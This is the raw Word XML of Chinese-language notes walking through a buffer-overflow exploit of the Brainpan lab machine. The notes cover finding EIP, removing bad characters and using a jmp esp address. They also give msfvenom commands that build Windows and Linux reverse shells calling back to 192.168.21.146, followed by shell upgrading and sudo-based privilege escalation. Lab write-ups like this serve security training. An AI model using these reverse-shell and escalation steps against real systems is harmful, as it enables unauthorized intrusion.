    <w:p w14:paraId="23C2E05F" w14:textId="503C335D" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r w:rsidRPr="0030039B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308B5545" wp14:editId="6C5313C7">
            <wp:extent cx="1920406" cy="5082980"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="868697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979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03A9" w14:textId="684FCF1E" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scii编码（4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b）（hex）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48221666" w14:textId="0F436EF2" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们找到了eip，只需要在后面放入shell再将eip指向shell（3</w:t>
      </w:r>
      <w:r>
        <w:t>50-400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）就可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C0988" w14:textId="6BD44B48" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改脚本（扩容c）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50005743" w14:textId="085A8F79" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r w:rsidRPr="0030039B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="153ED972" wp14:editId="49399315">
            <wp:extent cx="5274310" cy="4568825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="960626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61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2E25" w14:textId="6FD4AAFE" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能多不能少</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32573462" w14:textId="7A212E5C" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC660DC" w14:textId="1B798705" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r w:rsidRPr="0030039B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="203D7A06" wp14:editId="717EFC49">
            <wp:extent cx="2202371" cy="8055038"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
            <wp:docPr id="1205493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935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805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7E65" w14:textId="290DF13E" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030039B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16ECA60D" wp14:editId="0FAB01FD">
            <wp:extent cx="2370025" cy="1676545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2039096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964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6F81" w14:textId="0088AE97" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算字节数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8E991" w14:textId="1B01D10E" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r w:rsidRPr="0030039B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FBDD5E3" wp14:editId="335FBEE4">
            <wp:extent cx="5274310" cy="845185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="116379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96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36C0" w14:textId="0ACDCBFB" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一共4</w:t>
      </w:r>
      <w:r>
        <w:t>68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FD20DC" w14:textId="19B7AB6A" w:rsidR="0030039B" w:rsidRDefault="0030039B" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去掉坏字符</w:t>
      </w:r>
      <w:r w:rsidR="00CC4D3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不同的程序坏字符不一样，要去掉这些</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12915470" w14:textId="5A91636A" w:rsidR="00CC4D3E" w:rsidRDefault="00CC4D3E" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去github来解决可能的坏字符问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF97AC" w14:textId="53A49CA0" w:rsidR="00CC4D3E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r w:rsidRPr="00C7286E">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="00B3620C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://github.com/cytopia/badchars.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F8EC1F4" w14:textId="2EFE5E52" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r w:rsidRPr="00C7286E">
        <w:t>./badchars -f ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4651CC" w14:textId="76F85E87" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r w:rsidRPr="00C7286E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="314F5110" wp14:editId="6D39A4A1">
            <wp:extent cx="5274310" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="344905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058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4329" w14:textId="1A755D4E" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C7070" w14:textId="42A909D7" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r w:rsidRPr="00C7286E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69EB4602" wp14:editId="76B39DF3">
            <wp:extent cx="5274310" cy="5419725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="2075986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868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E94C" w14:textId="1AC05715" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ACC877" w14:textId="1C47EC31" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r w:rsidRPr="00C7286E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3CC495" wp14:editId="4C4E451F">
            <wp:extent cx="3718882" cy="2606266"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="865994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948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50B0" w14:textId="266BCD72" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意esp寄存器，右键follow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dump一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ECD6A8" w14:textId="7BE1545D" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7286E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6E7377" wp14:editId="3E50637D">
            <wp:extent cx="3353091" cy="426757"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="827394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945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E7EC" w14:textId="5027E73A" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在ff之后发现0</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且不是连续的证明有坏字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA5E08" w14:textId="16EB05D0" w:rsidR="00C7286E" w:rsidRDefault="00C7286E" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处只有0</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是坏字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A899335" w14:textId="4926DA89" w:rsidR="00C7286E" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改脚本（在前面的esp上面写出eip的地址）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72451516" w14:textId="7D07A973" w:rsidR="001D202D" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看jmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>esp的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4A7F2" w14:textId="32C42C26" w:rsidR="001D202D" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r w:rsidRPr="001D202D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ADE6DDF" wp14:editId="3229C31A">
            <wp:extent cx="4107536" cy="1188823"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="185565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583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0413" w14:textId="532F9C1B" w:rsidR="001D202D" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r w:rsidRPr="001D202D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64849099" wp14:editId="421D3A0F">
            <wp:extent cx="5274310" cy="1155700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="176105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569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BB94" w14:textId="29BFD4D9" w:rsidR="001D202D" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能找到brainpan的程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484A2295" w14:textId="6D3043C9" w:rsidR="001D202D" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现安全机制都没有启用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3759959D" w14:textId="0E4CCE7B" w:rsidR="001D202D" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r w:rsidRPr="001D202D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339A0340" wp14:editId="7A7CE9C7">
            <wp:extent cx="5274310" cy="412115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="807344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446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8B0F" w14:textId="3FD16CF2" w:rsidR="001D202D" w:rsidRDefault="001D202D" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个找到的地址就能发现这个是esp指针就能重定向到esp去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222D6AB" w14:textId="73611027" w:rsidR="001D202D" w:rsidRDefault="00136D23" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>311712f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDF24D" w14:textId="3EEC369A" w:rsidR="00136D23" w:rsidRDefault="00136D23" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为有大小端问题需要反写进入cpu（一般是小端）（字节倒序）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53969A5F" w14:textId="515AF35D" w:rsidR="00136D23" w:rsidRDefault="00136D23" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹shell编写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1C32B" w14:textId="58294D4A" w:rsidR="00136D23" w:rsidRDefault="00136D23" w:rsidP="007061D2">
      <w:r w:rsidRPr="00136D23">
        <w:t>msfvenom -p windows/shell_reverse_tcp lhost=192.168.21.146 lport=666 -b "\x00" -e x86/shikata_ga_nai -f c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36DF11" w14:textId="01E875D4" w:rsidR="00136D23" w:rsidRDefault="00136D23" w:rsidP="007061D2">
      <w:r w:rsidRPr="00136D23">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DFCEB2E" wp14:editId="1F70DD65">
            <wp:extent cx="5274310" cy="3462020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="753278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785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FE88" w14:textId="02F0F67B" w:rsidR="00136D23" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记得要用nop来空格解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552340B6" w14:textId="1271CB5E" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r w:rsidRPr="00753C82">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32937EA9" wp14:editId="392F553F">
            <wp:extent cx="5274310" cy="6443980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="437746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460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4B13" w14:textId="2B2E5DF2" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488DCC3F" w14:textId="1AB31ABC" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r w:rsidRPr="00753C82">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64156507" wp14:editId="3CDAF12E">
            <wp:extent cx="5274310" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="900704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046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CC48" w14:textId="50DD59A1" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D8B083" w14:textId="6FDC73C6" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>记得修改shell需要攻击靶机了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C4CA6" w14:textId="1599BC7A" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成linux的shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B317FD4" w14:textId="6705DA92" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="00753C82">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00753C82">
        <w:t>msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.21.146 lport=666 -b "\x00" -e x86/shikata_ga_nai -f c</w:t>
      </w:r>
      <w:r w:rsidRPr="00753C82">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="669F0C59" wp14:editId="5DE6703D">
            <wp:extent cx="5274310" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1893710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105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93E" w14:textId="12C386DE" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F8AE8" w14:textId="49A736EA" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r w:rsidRPr="00753C82">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF288C6" wp14:editId="62647F7D">
            <wp:extent cx="5274310" cy="4123055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="788394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942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7A66" w14:textId="7FE9EB9E" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36C52E" w14:textId="4F7A1D37" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r w:rsidRPr="00753C82">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ABFB49A" wp14:editId="19993190">
            <wp:extent cx="5274310" cy="1483995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1146440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404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8588" w14:textId="20EEEA5F" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>成功拿到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6A4E3" w14:textId="7A3BDE3A" w:rsidR="00753C82" w:rsidRDefault="00753C82" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提升交互性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA19E6" w14:textId="6BC1283C" w:rsidR="00753C82" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:t>python -c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD10B0" w14:textId="5E7D614E" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B0ADA96" wp14:editId="631DEA02">
            <wp:extent cx="5274310" cy="839470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="983369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699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EBF1" w14:textId="086BFC2A" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6284E" w14:textId="5C1E4612" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1072F596" wp14:editId="3D59E746">
            <wp:extent cx="5274310" cy="896620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="460014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146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6A55" w14:textId="281A0457" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更具提示往没有密码的位置钻</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB141D5" w14:textId="78848D65" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10315E98" wp14:editId="0DA41125">
            <wp:extent cx="5274310" cy="1071245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1450168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686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4B14" w14:textId="4B2FA38D" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有command可以去试试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C9A72" w14:textId="0DD8AEE3" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB9E7CC" wp14:editId="41F68B32">
            <wp:extent cx="5274310" cy="5100955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1451730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307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67FC" w14:textId="56473611" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F20CA3" wp14:editId="6647F166">
            <wp:extent cx="5274310" cy="3855720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="921801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14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0829" w14:textId="16568AD5" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接一个/bin</w:t>
      </w:r>
      <w:r>
        <w:t>/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抬走下一位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7C083" w14:textId="719109CA" w:rsidR="006447A6" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:r w:rsidRPr="006447A6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64318C3B" wp14:editId="1E679F7B">
            <wp:extent cx="5274310" cy="2585720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1370954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43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F6F1" w14:textId="4FEC3291" w:rsidR="006447A6" w:rsidRPr="00136D23" w:rsidRDefault="006447A6" w:rsidP="007061D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006447A6" w:rsidRPr="00136D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13B"/>
    <w:rsid w:val="0009113B"/>
    <w:rsid w:val="00136D23"/>
    <w:rsid w:val="001D202D"/>
    <w:rsid w:val="00294BCD"/>
    <w:rsid w:val="002A05C5"/>
    <w:rsid w:val="002F1CD2"/>
    <w:rsid w:val="0030039B"/>
    <w:rsid w:val="00436ABA"/>
    <w:rsid w:val="006447A6"/>
    <w:rsid w:val="007061D2"/>
    <w:rsid w:val="00711149"/>
    <w:rsid w:val="00753C82"/>
    <w:rsid w:val="009341EF"/>
    <w:rsid w:val="00B21E06"/>
    <w:rsid w:val="00C7286E"/>
    <w:rsid w:val="00CC4D3E"/>
    <w:rsid w:val="00DE2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39E73"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2B24DA7D-5ECF-4D93-A274-D0B313EF5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286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728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s://github.com/cytopia/badchars.git" TargetMode="External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25</Pages>
  <Words>377</Words>
  <Characters>2151</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>17</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2523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泽巍</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>吴 泽巍</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-11T06:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-11T08:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>